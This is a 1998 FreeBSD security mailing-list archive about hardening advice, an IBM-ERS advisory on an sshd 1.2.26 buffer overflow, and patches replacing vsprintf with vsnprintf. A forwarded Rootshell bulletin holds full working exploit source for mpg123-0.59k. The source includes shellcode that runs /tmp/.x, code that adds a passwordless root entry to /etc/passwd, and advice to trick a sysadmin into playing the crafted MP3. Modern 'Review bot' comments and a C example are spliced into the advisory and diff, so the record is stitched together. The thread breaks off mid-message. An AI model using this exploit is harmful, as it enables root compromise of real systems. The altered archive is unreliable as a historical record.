From owner-freebsd-security Sun Nov 1 01:01:17 1998
From: "Dan Langille"
Organization: DVL Software Limited
To: security@FreeBSD.ORG
Date: Sun, 1 Nov 1998 22:01:10 +1300
Subject: no telnet. how secure?
Message-Id: <199811010901.WAA12524@witch.xtra.co.nz>

I don't allow telnet to my box. I'm the only user. I'm running a webserver, but it's not published. There's no CGI apart from what came with Apache. How vulnerable is such a machine to attack? I would like to exclude DOS attacks from this discussion as I feel that's something outside the scope of this question.
--
Dan Langille
The FreeBSD Diary - my [mis]adventures
http://www.FreeBSDDiary.com

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Nov 1 03:02:39 1998
From: Darren Reed
To: junkmale@xtra.co.nz
Cc: freebsd-security@FreeBSD.ORG
Date: Sun, 1 Nov 1998 22:02:10 +1100 (EDT)
Subject: Re: IPFW problems...
Message-Id: <199811011102.DAA13883@hub.freebsd.org>
In-Reply-To: <199810291803.HAA15509@witch.xtra.co.nz> from "Dan Langille" at Oct 30, 98 07:03:17 am

In some mail from Dan Langille, sie said:
>
> On 29 Oct 98, at 21:45, Darren Reed wrote:
>
> > traceroute/UDP was fixed on the weekend last, the pc (ICMP) version may
> > not yet work.
>
> OK. Good! Can you guess when the other version will work?

My testing shows "traceroute -I" to work properly with NAT.
Darren

From owner-freebsd-security Sun Nov 1 03:42:39 1998
From: Nicholas Charles Brawn
To: Dan Langille
Cc: security@FreeBSD.ORG
Date: Sun, 1 Nov 1998 22:42:20 +1100 (EST)
Subject: Re: no telnet. how secure?
In-Reply-To: <199811010901.WAA12524@witch.xtra.co.nz>

On Sun, 1 Nov 1998, Dan Langille wrote:

: I don't allow telnet to my box. I'm the only user. I'm running a
: webserver, but it's not published. There's no CGI apart from what came
: with Apache. How vulnerable is such a machine to attack? I would like to
: exclude DOS attacks from this discussion as I feel that's something outside
: the scope of this question.

As listmembers, we can only really suggest common sense solutions without further information of your network and system setup. But here's my $0.02 worth of advice nevertheless. :)

- Don't run services you don't need to run. Edit inetd.conf and rc.conf accordingly.

- Compile firewall support into your kernel, or make use of the ipfw loadable kernel module. Learn how to use it effectively.

- Learn what files on your system are privileged (suid/sgid). Then, go through them one by one, and decide whether they *really* need to be privileged. Robert Watson's tool 'suidcontrol' is well suited to this task: http://www.watson.org/fbsd-hardening/suidcontrol.html

- Check recent CERT advisories and FreeBSD Security Advisories, and determine whether your system needs patching/etc. If so, apply them.

- Keep abreast of the latest security developments and vulnerabilities. Subscribing to mailing lists such as this one and BUGTRAQ is a good start.

- If you have users, set appropriate defaults in such files as /etc/profile for umask and other settings that affect security.

URLs you should check on a semi-regular basis:

- http://www.freebsd.org/security/ FreeBSD's Security Site
- http://www.watson.org/fbsd-hardening/ FreeBSD Hardening Project
- http://www.best.com/~jkb/howto.txt FreeBSD Security Howto

: --
: Dan Langille
: The FreeBSD Diary - my [mis]adventures
: http://www.FreeBSDDiary.com

Hope that's of help,

Nick

--
Email: ncb05@uow.edu.au - http://rabble.uow.edu.au/~nick
Key fingerprint = DE 30 33 D3 16 91 C8 8D A7 F8 70 03 B7 77 1A 2A

From owner-freebsd-security Sun Nov 1 14:56:11 1998
From: bow
To: FreeBSD-security@FreeBSD.ORG
Date: Sun, 1 Nov 1998 14:54:57 -0800 (PST)
Subject: [rootshell] Security Bulletin #25 (fwd)
Message-Id: <199811012254.OAA29528@bow.net>

----- Forwarded message from announce-outgoing@rootshell.com -----

From root@proxy-sd-1.connectnet.com Sun Nov 1 12:54:52 1998
Date: 1 Nov 1998 20:43:19 -0000
From: announce-outgoing@rootshell.com
Subject: [rootshell] Security Bulletin #25

www.rootshell.com Security Bulletin #25
November 1st, 1998
[ http://www.rootshell.com/ ]

----------------------------------------------------------------------
To unsubscribe from this mailing list send e-mail to majordomo@rootshell.com with "unsubscribe announce" in the BODY of the message. Send submissions to info@rootshell.com. Messages sent will not be sent to other members on this list unless it is featured in a security bulletin. An archive of this list is available at: http://www.rootshell.com/mailinglist-archive
----------------------------------------------------------------------

Contents
--------

01. ssh 1.2.26 vulnerability
02. mpg123-0.59k buffer overflow with exploit

01. ssh 1.2.26 vulnerability
----------------------------

As most of you are aware, the Rootshell site was compromised on October 28th. In order to keep the integrity of our investigation we have been fairly closed-lipped about this incident until now. This has led to widespread rumors and speculation by netizens who have zero first hand knowledge about the break-in. Some people now believe that we had no evidence of an ssh break-in. SSH Communications Security Ltd. even went as far as saying they have analyzed the Rootshell logs, etc. Unless they have broken into our network this is not possible. We at Rootshell believe they are now simply in damage control mode and nothing else.
Since the very beginning, Rootshell has been working very closely with the folks at CERT, and the members of law enforcement to track down the individuals responsible for the Rootshell break-in. As the ssh issue has been a very sensitive topic we have avoided making any statements until we were sure about anything one way or the other. The *ONLY* thing Rootshell has ever said in public about SSH until now has been "The paranoid MAY want to disable ssh 1.2.26."

In order to show the type of evidence Rootshell has received at this point, below you will find a draft that IBM was intending to release on Monday about SSH. They appear to have jumped the gun slightly and do not have working exploit code, but have found possible buffer overflows in the ssh 1.2.26 code. Rootshell has also received further reports of exploit code going around in various circles. SSH Communications Security Ltd. has evaluated this bulletin and now believes it is actually not a problem. Rootshell will continue its investigation of this matter as well as other security issues and will make this information public as soon as possible.

I hope that this bulletin will at the very least put an end to the wild speculation that this was a hoax, or that we are just in the business of making wild accusations.

Please see http://www.ssh.fi/sshprotocols2/rootshell.html for their "analysis" of events. It is sad that we had to learn of this URL from Slashdot.org instead of SSH directly. They appear to have some serious communications difficulties. Both Rootshell and CERT were met with unanswered phones at SSH Communications Security Ltd. and Data Fellows when we attempted to research this matter. Perhaps after this incident they can work on correcting these issues.

SSH is a trademark of SSH Communications Security Ltd. All rights reserved.
[ end rant ]

--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--
---EXTERNAL RELEASE---EXTERNAL RELEASE---EXTERNAL RELEASE---EXTERNAL RELEASE---

EMERGENCY RESPONSE SERVICE
SECURITY VULNERABILITY ALERT

30 October 1998 18:00 GMT                        Number: ERS-SVA-E01-1998:005.1
===============================================================================

VULNERABILITY SUMMARY

VULNERABILITY:  Buffer overflow condition in "sshd" logging facility

PLATFORMS:      Versions of SSH up to and including SSH 1.2.26.
                SSH 2.0.x is *not* believed to be vulnerable.

SOLUTION:       Follow the procedures described in Section IV, below

THREAT:         Local and remote users can obtain privileged access to the system.

===============================================================================

DETAILED INFORMATION

I. Description

SSH (Secure Shell) is software that allows users to log into other computers over a network, execute commands on remote systems, and move files from one host to another. It provides strong authentication and secure (encrypted) communications over insecure channels. SSH is produced by SSH Communications Security, Ltd., Finland (www.ssh.fi). SSH is distributed for non-commercial use from ftp://ftp.cs.hut.fi/pub/ssh; commercial licensing is handled by Data Fellows, Ltd. (www.datafellows.com).

The IBM Global Security Analysis Laboratory has identified a buffer overflow vulnerability in the SSH server program, "sshd." The "log_msg" function, called by several parts of the server program to send information to the system log, copies user-supplied data into a local buffer without checking that the data will fit. Several other similar logging, debug, and error functions perform this operation as well.
When a large amount of data is supplied, a buffer overrun condition will occur.

II. Impact

If a user is able to exploit this vulnerability to create a buffer overrun, it may be possible for the user to supply machine-language program instructions that will then be executed with the privileges of the user running the "sshd" program, usually the super-user.

This vulnerability can be exploited by local and remote users. The person exploiting the vulnerability does not need to have an account on the machine running "sshd" to succeed.

III. Platform-Specific Threats

This vulnerability affects recent (and perhaps older) 1.2.x versions of the "sshd" server. The current 1.2.x version of the server is 1.2.26. It is believed that the 2.0.x versions of the "sshd" server do not contain this vulnerability. The current 2.0.x version of the server is 2.0.9.

IV. Solutions

IBM-ERS has provided the information it has developed about this vulnerability to SSH Communications Security, Ltd, and anticipates that a new version of SSH 1.2.x that fixes this vulnerability will be available soon. When this new version becomes available, IBM-ERS urges all sites to upgrade their SSH servers to the new release as quickly as possible.

In the meantime, however, IBM-ERS and the IBM GSAL have developed the three following specific actions that you can take to address this vulnerability.

Option 1: Operate the "sshd" program with the "-q" option turned on. Note that this will disable the logging functions normally performed. This may be undesirable in some situations.

Option 2: If possible, upgrade to version 2.0.x of SSH. This version supports a newer, more capable version of the SSH protocol and offers additional features.

Option 3: Follow the procedure below to patch the SSH 1.2.26 source code to address this vulnerability in a manner similar to the way the SSH 2.0.x source code addresses it.
NOTE: This procedure should only be attempted by persons familiar with installing the SSH software from source code.

1. Obtain the source code distributions for SSH 1.2.26 and SSH 2.0.9 from ftp://ftp.cs.hut.fi/pub/ssh or Data Fellows, Ltd. Be sure to observe all licensing requirements.

2. Copy the following files

       lib/sshutil/snprintf.h
       lib/sshutil/snprintf.c

   from the SSH 2.0.9 directory to the SSH 1.2.26 directory (put them at the top level, do not reproduce the subdirectories).

3. Edit "Makefile.in" in the SSH 1.2.26 directory and add the word "snprintf.o" to the "COMMON_OBJS" and "SCP_OBJS" definitions. Also add the word "snprintf.h" to the "HEADERS" definition.

4. Edit the files "log-server.c," "packet.c," and "scp.c" in the SSH 1.2.26 directory and do the following:

   a. Add the line

          #include "snprintf.h"

      near the top of each file with the rest of the "#include" lines.

   b. Locate all occurrences of

          vsprintf(buf, fmt, args);

      in each file and replace them with

          vsnprintf(buf, sizeof(buf), fmt, args);

      There are six (6) occurrences in "log-server.c," two (2) in "packet.c," and one (1) in "scp.c".

5. Edit "snprintf.h" and change the line

       #include "sshincludes.h"

   to read

       #include "includes.h"

   Also delete the two occurrences of the word "DLLEXPORT."

6. Edit "snprintf.c" and change the line

       #include "sshincludes.h"

   to read

       #include "includes.h"

   Also replace the one occurrence of "ssh_xmalloc" with "xmalloc", and the two occurrences of "ssh_xfree" with "xfree".

7. Read the instructions in the "INSTALL" file in the SSH 1.2.26 directory to build and install the modifications made above.

IBM-ERS and IBM GSAL have carefully examined the SSH 1.2.26 source code, and tested these steps on a production "sshd" server. No ill effects have been observed.
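The change step 4b makes, vsprintf() into a fixed local buffer replaced by vsnprintf(buf, sizeof(buf), ...), shown as an added example written for this page; it is not IBM-ERS's, Rootshell's or the SSH sources' code. The routine below is a stand-in for the advisory's log_msg pattern: it bounds the write, checks that the buffer still ends in a NUL, and uses the vsnprintf() return value to report that a long caller-supplied string was cut off rather than losing that fact silently. LOG_BUF_SIZE, the function names, the 10.0.0.1 address and the constructed 4000-byte "user name" are assumptions for illustration; the real sshd buffers are larger, but vsprintf() checks no size at all, so the defect does not depend on the number.

```c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed buffer size for this example (the real sshd buffers are larger). */
#define LOG_BUF_SIZE 128

/* What one bounded log call did, so the caller can inspect the outcome. */
struct log_result {
    size_t stored;      /* bytes placed in the buffer, excluding the NUL */
    int    truncated;   /* 1 if the formatted message did not fit */
    int    terminated;  /* 1 if a NUL lies inside the buffer's bounds */
};

/* Bounded version of the log_msg pattern: vsnprintf() with sizeof(buf), the
 * same replacement step 4b makes. vsnprintf() returns the length the message
 * would have had; a value of sizeof(buf) or more means it was cut off. A
 * pre-C99 libc may return -1 in that case instead, so both count as truncation. */
struct log_result log_msg_bounded(const char *fmt, ...)
{
    char buf[LOG_BUF_SIZE];
    struct log_result r;
    va_list args;
    int n;

    va_start(args, fmt);
    n = vsnprintf(buf, sizeof(buf), fmt, args);   /* never writes past buf */
    va_end(args);

    r.truncated  = (n < 0 || (size_t)n >= sizeof(buf));
    r.terminated = (memchr(buf, '\0', sizeof(buf)) != NULL);
    r.stored     = r.terminated ? strlen(buf) : sizeof(buf);

    /* sshd would hand buf to syslog or stderr here; this example marks a cut
     * message so the loss is visible in the log rather than silent. */
    fprintf(stderr, "%s: %s\n", r.truncated ? "log (truncated)" : "log", buf);
    return r;
}

/* Constructed stand-in for the long caller-supplied string the advisory
 * describes (for instance an overlong user name offered at login). */
char *make_long_name(size_t len)
{
    char *s = malloc(len + 1);
    if (s == NULL)
        return NULL;
    memset(s, 'A', len);
    s[len] = '\0';
    return s;
}

int main(void)
{
    struct log_result r;
    char *name = make_long_name(4000);   /* far larger than LOG_BUF_SIZE */

    if (name == NULL)
        return 1;

    r = log_msg_bounded("Connection from %s", "10.0.0.1");
    printf("short message: stored=%zu truncated=%d\n", r.stored, r.truncated);

    r = log_msg_bounded("Failed login for user %s", name);
    printf("long message:  stored=%zu truncated=%d\n", r.stored, r.truncated);

    free(name);
    return 0;
}
```

The check on the return value is the part the advisory's one-line replacement does not give you: with vsprintf() the overlong message corrupted the stack, with a bare vsnprintf() it is dropped on the floor, and with the return value inspected the log still records that something unusually long arrived, which is the event a defender wants to see.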
However, because it is impossible to anticipate all possible environments in which SSH is used, the following disclaimer applies to the procedures above:

THESE PROCEDURES ARE PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND, INCLUDING, WITHOUT LIMITATION, ANY IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. THIS ADVISORY DOES NOT CREATE OR IMPLY ANY SUPPORT OBLIGATIONS OR ANY OTHER LIABILITY ON THE PART OF IBM OR ITS SUBSIDIARIES.

V. Acknowledgements

IBM-ERS would like to thank Alan and Art at the IBM Global Security Analysis Laboratory for their work in identifying this problem.

SSH and Secure Shell are trademarks or registered trademarks of SSH Communications Security Ltd.

===============================================================================

IBM's Internet Emergency Response Service (IBM-ERS) is a subscription-based Internet security response service that includes computer security incident response and management, regular electronic verification of your Internet gateway(s), and security vulnerability alerts similar to this one that are tailored to your specific computing environment. By acting as an extension of your own internal security staff, IBM-ERS's team of Internet security experts helps you quickly detect and respond to attacks and exposures across your Internet connection(s).

As a part of IBM's Business Recovery Services organization, the IBM Internet Emergency Response Service is a component of IBM's SecureWay(tm) line of security products and services. From hardware to software to consulting, SecureWay solutions can give you the assurance and expertise you need to protect your valuable business resources.

To find out more about the IBM Internet Emergency Response Service, send an electronic mail message to ers-sales@vnet.ibm.com, or call 1-800-742-2493 (Prompt 4).

IBM-ERS maintains a site on the World Wide Web at http://www.ers.ibm.com/.
Visit the site for information about the service, copies of security alerts, team contact information, and other items.

IBM-ERS uses Pretty Good Privacy* (PGP*) as the digital signature mechanism for security vulnerability alerts and other distributed information. The IBM-ERS PGP* public key is available from http://www.ers.ibm.com/team-info/pgpkey.html. "Pretty Good Privacy" and "PGP" are trademarks of Philip Zimmermann.

IBM-ERS is a Member Team of the Forum of Incident Response and Security Teams (FIRST), a global organization established to foster cooperation and response coordination among computer security teams worldwide.

Copyright 1998 International Business Machines Corporation.

The information in this document is provided as a service to customers of the IBM Emergency Response Service. Neither International Business Machines Corporation, nor any of its employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process contained herein, or represents that its use would not infringe any privately owned rights. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation or favoring by IBM or its subsidiaries. The views and opinions of authors expressed herein do not necessarily state or reflect those of IBM or its subsidiaries, and may not be used for advertising or product endorsement purposes.

The material in this security alert may be reproduced and distributed, without permission, in whole or in part, by other security incident response teams (both commercial and non-commercial), provided the above copyright is kept intact and due credit is given to IBM-ERS.
This security alert may be reproduced and distributed, without permission, in its entirety only, by any person provided such reproduction and/or distribution is performed for non-commercial purposes and with the intent of increasing the awareness of the Internet community.

---EXTERNAL RELEASE---EXTERNAL RELEASE---EXTERNAL RELEASE---EXTERNAL RELEASE---
--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--ERS-ALERT--

02. mpg123-0.59k buffer overflow with exploit
---------------------------------------------

From na98jen@student.hig.se Sun Nov 1 12:31:44 1998
Date: Sun, 1 Nov 1998 12:56:37 +0100 (MET)
From: Joel Eriksson
To: submission@rootshell.com
Subject: mpg123-0.59k bufferoverflow.

More info in my Bugtraq-posting... Here I'll just include the stuff for the sCr1p+-k1dD13z. This will create a 56 bytes MP3 that executes /tmp/.x which could for example be a program that checks the UID and if run by root creates a new account / SUID-shell / installs backdoors / whatever, and if run by a user adds entries to their .rhosts or something..

I have included a 93 bytes buffer with machinecode to create a new root-account on the system which I planned to read in and jmp to with the 48 bytes we can use in the overflow. Have not had the time to fix some problems with this method though, so you'll have to satisfy with this if you don't want to code it yourself.

For those who haven't figured that out yet you'll have to get someone to try to listen to the damn thing too. :-) (I say this in the comments to the src too, but no one seems to read those damn comments anyway so..) You could for example mail the file to other users / the sysadmin, or just have it in /tmp or your homedir and wait 'til someone gets curious..

--- mp3exp.c START [cut here] /* ** Exploit for mpg123-0.59k, Linux x86. ** --- calcaddr.sh START #!/bin/sh perl -e 'print "RIFF" . 
"A"x56'>bof.mp3 mpg123 bof.mp3 2> /dev/null echo info all-registers \ |gdb mpg123 core 2>/dev/null|egrep "^esp"|awk '{print $2}' rm -f bof.mp3 --- calcaddr.sh END ** ** Give the address shown by calcaddr.sh as the first argument to ** this exploit, and it will handle the rest.. (e.g. subtract 0x4C ** from the address given) OBS! If you do what the script does manually ** you will not get the same result. Then CALCOFFSET should be 0x34 instead. ** ** mpg123-0.59o is not vulnerable, previous versions not checked. ** ** DESCRIPTION: ** ** Makes an MP3-file that executes a program when played with mpg123-0.59k. ** Will be more useful when I have succeded in making it add an account, ** the problem is that we only have 48 bytes to work with and my code ** to add a new account takes 93 bytes. ** ** For those who have not understood that yet, the trick is too get ** *someone*else* to play the MP3 using mpg123. You could for example ** mail the file to the sysadmin or just have it in /tmp and name it ** something like k3w1-mUz4c.MP3 or whatever may seem appropriate. :-) ** ** Plan: In the 48 bytes I can put my code I'll make a routine that ** just allocates a buffer, reads in the 93 bytes required to add ** an account and jmp's to the beginning of the code. ** ** (C) 1998/10/31, Joel Eriksson - Chaoz on IRCNet. ** ** Disclaimer: This program is for informational purposes only. ** I can not be held responsible for any use or misuse ** of this program. And so on, the usual stuff.. */ #include #include #include #include #include #include #include #define ADDRLEN 4 #define DEFAULT_OFFSET -0x88; #define CALCOFFSET -0x4C /* ** When the address is calculated in a subshell (e.g. using the script ** included with this sourcecode) the offset is -0x4C, but when it is ** calculated manually in the lowest shell-level the offset is -0x34. 
*/ #define MP3NAME "bof.mp3" const char FILLCHAR = '.'; /* ** Standard shellcode, made by Aleph One, published in Phrack #49 ** Modified to execute /tmp/.x instead of /bin/sh. ** ** /tmp/.x could for example add an account, create a SUID-root shell ** or if run by an ordinary user add an entry to their .rhosts, create ** a SUID-user shell or something else that seems like a good idea. */ char shellcode[] = "\xeb\x1f" // jmp 0x1f "\x5e" // popl %esi "\x89\x76\x08" // movl %esi,0x8(%esi) "\x31\xc0" // xorl %eax,%eax "\x88\x46\x07" // movb %al,0x7(%esi) "\x89\x46\x0c" // movl %eax,0xc(%esi) "\xb0\x0b" // movb $0xb,%al "\x89\xf3" // movl %esi,%ebx "\x8d\x4e\x08" // leal 0x8(%esi),%ecx "\x8d\x56\x0c" // leal 0xc(%esi),%edx "\xcd\x80" // int $0x80 "\x31\xdb" // xorl %ebx,%ebx "\x89\xd8" // movl %ebx,%eax "\x40" // inc %eax "\xcd\x80" // int $0x80 "\xe8\xdc\xff\xff\xff" // call -0x24 "/tmp/.x"; // .string "/bin/sh" // 46 bytes /* ** To execute something else than /tmp/.x just change the last string, ** but remember that it must be a 7 bytes string. It's possible to ** change the shellcode to execute a command with a longer path than ** 7 bytes by changing the offsets from %esi, which is not too hard ** if you know some assembler. */ /* ** Code to add user to passwd-file, made by me. Not used in this ** particular exploit yet, but ideally it'd be read in and executed ** by the 48 bytes that I have used to execute a shell in this exploit. ** This way the exploit becomes more interesting since it can be exploited ** remotely. We need to do some stackprediction though.. ** ** If someone makes an exploit that uses this code, make sure to include ** me in the greetings. 
*/ char addusercode[] = "\xeb\x3d" // jmp 0x3d "\x5e" // popl %esi "\x89\x76\x1a" // movl %esi,0x1a(%esi) "\x31\xc0" // xorl %eax,%eax "\x88\x46\x0b" // movb %al,0x0b(%esi) "\x83\xc6\x0c" // addl $0x0c,%esi "\x89\x76\x12" // movl %esi,0x12(%esi) "\x83\xee\x0c" // subl $0x0c,%esi "\x31\xc0" // xorl %eax,%eax "\x88\x46\x19" // movb %al,0x19(%esi) "\x8b\x5e\x1a" // movl 0x1a(%esi),%ebx "\x31\xc9" // xorl %ecx,%ecx "\xb5\x04" // movb $0x4,%ch "\xb1\x01" // movb $0x1,%cl "\x31\xc0" // xorl %eax,%eax "\xb0\x05" // movb $0x5,%al "\xcd\x80" // int $0x80 "\x89\xc3" // movl %eax,%ebx "\x8b\x4e\x1e" // movl 0x1e(%esi),%ecx "\x31\xd2" // xorl %edx,%edx "\xb2\x0d" // movb $13,%edx "\x31\xc0" // xorl %eax,%eax "\xb0\x04" // movb $0x4,%al "\xcd\x80" // int $0x80 "\x31\xdb" // xorl %ebx,%ebx "\x31\xc0" // xorl %eax,%eax "\xb0\x01" // movb $0x1,%al "\xcd\x80" // int $0x80 "\xe8\xbe\xff\xff\xff" // call -0x46 "/etc/passwd." // .string "/etc/passwd" "r00t::0:0:::\x0a"; // .string "r00t::0:0:::\n" // 93 bytes unsigned long getsp() { __asm("mov %esp, %eax"); } int main(int argc, char **argv) { unsigned long addr; char *addr_ptr = (char*)&addr; int fd, i; char *filename = MP3NAME; addr = getsp() + DEFAULT_OFFSET; if(argc > 1) { /* ** This is UGLY coding. :-) strtol() overflows for some reason ** when just doing one strtol() on argv[1]. */ char *strptr = argv[1]; char *numptr; char cur[3]; char temp; int i; memset(addr_ptr, 0, ADDRLEN); memset(cur, 0, 3); if(!strncmp(strptr, "0x", 2)) strptr += 2; for(i=0; i 2) filename = argv[2]; if(argc > 3) { fprintf(stderr, "Usage: %s [
] []\n", argv[0]); exit(1); } if((fd = open(filename, O_WRONLY|O_CREAT|O_EXCL, 0644)) == -1) { perror("open"); fprintf(stderr, "Could not create %s\n", filename); exit(1); } printf("Using address: 0x%lx\n", addr); write(fd, "RIFF", 4); write(fd, shellcode, strlen(shellcode)); for(i=0; i<48-strlen(shellcode); i++) write(fd, &FILLCHAR, 1); for(i=0; i<4; i++) write(fd, &addr_ptr[i], 1); printf("\nMP3 created in %s.\n", filename); exit(0); } -- mp3exp.c END [cut here]

----------------------------------------------------------------------

----- End of forwarded message from announce-outgoing@rootshell.com -----

From owner-freebsd-security Sun Nov 1 15:42:18 1998
Date: Sun, 1 Nov 1998 18:42:13 -0500 (EST)
From: "Matthew N. Dodd"
To: freebsd-security@FreeBSD.ORG
Subject: SSH vsprintf patch. (You've been warned Mr. Glass)

Look for details on this tomorrow but here is a patch that addresses the vsprintf calls in ssh 1.2.26.

--- log-server.c.orig Sun Nov 1 18:21:57 1998 +++ log-server.c Sun Nov 1 18:20:39 1998 @@ -134,7 +134,7 @@ if (log_quiet) return; va_start(args, fmt); - vsprintf(buf, fmt, args); + vsnprintf(buf, sizeof(buf), fmt, args); va_end(args); if (log_on_stderr) fprintf(stderr, "log: %s\n", buf); @@ -175,7 +175,7 @@ if (log_quiet) return; va_start(args, fmt); - vsprintf(buf, fmt, args); + vsnprintf(buf, sizeof(buf), fmt, args); va_end(args); if (log_on_stderr) fprintf(stderr, "log: %s\n", buf); @@ -191,7 +191,7 @@ if (!log_debug || log_quiet) return; va_start(args, fmt); - vsprintf(buf, fmt, args); + vsnprintf(buf, sizeof(buf), fmt, args); va_end(args); if (log_on_stderr) fprintf(stderr, "debug: %s\n", buf); @@ -207,7 +207,7 @@ if (log_quiet) return; va_start(args, fmt); - vsprintf(buf, fmt, args); + vsnprintf(buf, sizeof(buf), fmt, args); va_end(args); if (log_on_stderr) fprintf(stderr, "error: %s\n", buf); @@ -302,7 +302,7 @@ if (log_quiet) exit(1); va_start(args, fmt); - vsprintf(buf, fmt, args); + vsnprintf(buf, sizeof(buf), fmt, args); va_end(args); if (log_on_stderr) fprintf(stderr, "fatal: %s\n", buf);
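Review bot: each of these log-server.c hunks (at 134, 175, 191, 207 and 302) bounds the write with sizeof(buf) while the declaration of buf lies outside the three context lines shown, so the fix only holds if buf is a fixed-size array in every one of those functions; if any of them declares or receives buf as `char *`, sizeof(buf) is the pointer's size and the call is limited to a few bytes rather than to the buffer. Please confirm the declaration in each function, or widen the context to show it, the way the scp.c hunk does with `char buf[1024];`. Since vsnprintf truncates silently, an error or fatal message built from remote input may now be cut short in the log; that is worth a sentence in the details promised for tomorrow.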
@@ -321,7 +321,7 @@ if (log_quiet) exit(1); va_start(args, fmt); - vsprintf(buf, fmt, args); + vsnprintf(buf, sizeof(buf), fmt, args); va_end(args); if (log_on_stderr) fprintf(stderr, "fatal: %s\n", buf); --- packet.c.orig Sun Nov 1 18:16:33 1998 +++ packet.c Sun Nov 1 18:25:11 1998 @@ -693,7 +693,7 @@ va_list args; va_start(args, fmt); - vsprintf(buf, fmt, args); + vsnprintf(buf, sizeof(buf), fmt, args); va_end(args); packet_start(SSH_MSG_DEBUG); @@ -719,7 +719,7 @@ /* Format the message. Note that the caller must make sure the message is of limited size. */ va_start(args, fmt); - vsprintf(buf, fmt, args); + vsnprintf(buf, sizeof(buf), fmt, args); va_end(args); /* Send the disconnect message to the other side, and wait for it to get --- scp.c.orig Sun Nov 1 18:16:41 1998 +++ scp.c Sun Nov 1 18:25:56 1998 
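Review bot: the packet.c @@ -719 hunk keeps the comment "the caller must make sure the message is of limited size" although the bounded call now enforces that itself; update or drop the comment so a later reader does not take it as licence to put vsprintf back. Separately, this patch relies on the system libc providing vsnprintf, whereas the IBM-ERS procedure earlier in this thread carries snprintf.c over from SSH 2.0.9 for platforms that lack one; stating which FreeBSD release the patch was built and tested against would help anyone applying it elsewhere.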
@@ -332,7 +332,7 @@ char buf[1024]; va_start(ap, fmt); - vsprintf(buf, fmt, ap); + vsnprintf(buf, sizeof(buf), fmt, ap); va_end(ap); fprintf(stderr, "%s\n", buf); exit(255);

--
| Matthew N. Dodd | 78 280Z | 75 164E | 84 245DL | FreeBSD/NetBSD/Sprite/VMS |
| winter@jurai.net | This Space For Rent | ix86,sparc,m68k,pmax,vax |
| http://www.jurai.net/~winter | Are you k-rad elite enough for my webpage? |

[base64-encoded attachment vsprintf.patch omitted]
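Review bot: in the packet.c @@ -719 hunk the context comment above the change, "the caller must make sure the message is of limited size", described the contract vsprintf needed and is now stale; with vsnprintf an over-long disconnect reason is cut at sizeof(buf) instead of overflowing, and because the return value is ignored the truncation is silent. Suggest rewording the comment and checking the result, along the lines of `n = vsnprintf(buf, sizeof(buf), fmt, args); if (n < 0 || n >= sizeof(buf)) ...` (the `n < 0` case covers pre-C99 libcs that return -1 on truncation), so a clipped disconnect message is at least logged. The same unchecked return applies to the log-server.c @@ -321 and scp.c @@ -332 hunks; on those fatal()/exit paths a silently clipped message is tolerable.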
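Review bot: sizeof(buf) in each `+` line is only correct where buf is an array in the enclosing scope. The scp.c @@ -332 hunk shows `char buf[1024];` in its context, so it is right there, but the log-server.c @@ -321 and packet.c @@ -693 and @@ -719 hunks do not show the declaration of buf; please confirm none of those is a `char *buf` parameter or heap pointer, because sizeof(buf) would then be the pointer size and every message through that path would be cut to sizeof(char *) - 1 characters.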
From owner-freebsd-security Sun Nov 1 15:58:17 1998
To: "Matthew N. Dodd"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)
In-reply-to: Your message of "Sun, 01 Nov 1998 18:42:13 EST."
Date: Sun, 01 Nov 1998 15:58:25 -0800
Message-ID: <21420.909964705@time.cdrom.com>
From: "Jordan K. Hubbard"

> Look for details on this tomorrow but here is a patch that addresses the
> vsprintf calls in ssh 1.2.26.

Is there a provable exploit for this also?

- Jordan

From owner-freebsd-security Sun Nov 1 16:03:57 1998
Date: Sun, 1 Nov 1998 19:03:42 -0500 (EST)
From: "Matthew N. Dodd"
To: "Jordan K. Hubbard"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)
In-Reply-To: <21420.909964705@time.cdrom.com>

On Sun, 1 Nov 1998, Jordan K. Hubbard wrote:
> > Look for details on this tomorrow but here is a patch that addresses the
> > vsprintf calls in ssh 1.2.26.
>
> Is there a provable exploit for this also?

Not that I've seen. One is rumored to be floating around.

The previous message (forwarded from rootshell to -security by someone
else) has most of the info I've seen.

I'll attempt to find out more from Alan Cox the next time he jumps on irc.

--
| Matthew N. Dodd | 78 280Z | 75 164E | 84 245DL | FreeBSD/NetBSD/Sprite/VMS |
| winter@jurai.net | This Space For Rent | ix86,sparc,m68k,pmax,vax |
| http://www.jurai.net/~winter | Are you k-rad elite enough for my webpage? |

From owner-freebsd-security Sun Nov 1 16:08:05 1998
To: "Matthew N. Dodd"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)
In-reply-to: Your message of "Sun, 01 Nov 1998 19:03:42 EST."
Date: Sun, 01 Nov 1998 16:08:15 -0800
Message-ID: <21498.909965295@time.cdrom.com>
From: "Jordan K. Hubbard"

> Not that I've seen. One is rumored to be floating around.

Yeah, rumored is the right word. :)

> The previous message (forwarded from rootshell to -security by someone
> else) has most of the info I've seen.

I read that too, yeah. Basically, I've seen evidence of provable buffer
overflows (but not proven exploitability of same) and I've seen a hacked
site whose admins can't think of many other ways to be hacked and are
pointing either correctly or incorrectly at ssh as the cause in their
first round of theories. Either way, it's just all too guessy for me
right now - I'd sure like to see an actual exploit here before declaring
this most security scare concluded. :(

- Jordan

From owner-freebsd-security Sun Nov 1 16:11:13 1998
Date: Sun, 1 Nov 1998 19:11:00 -0500 (EST)
From: "Matthew N. Dodd"
To: "Jordan K. Hubbard"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: SSH vsprintf patch. (You've been warned Mr. Glass)
In-Reply-To: <21498.909965295@time.cdrom.com>

On Sun, 1 Nov 1998, Jordan K. Hubbard wrote:
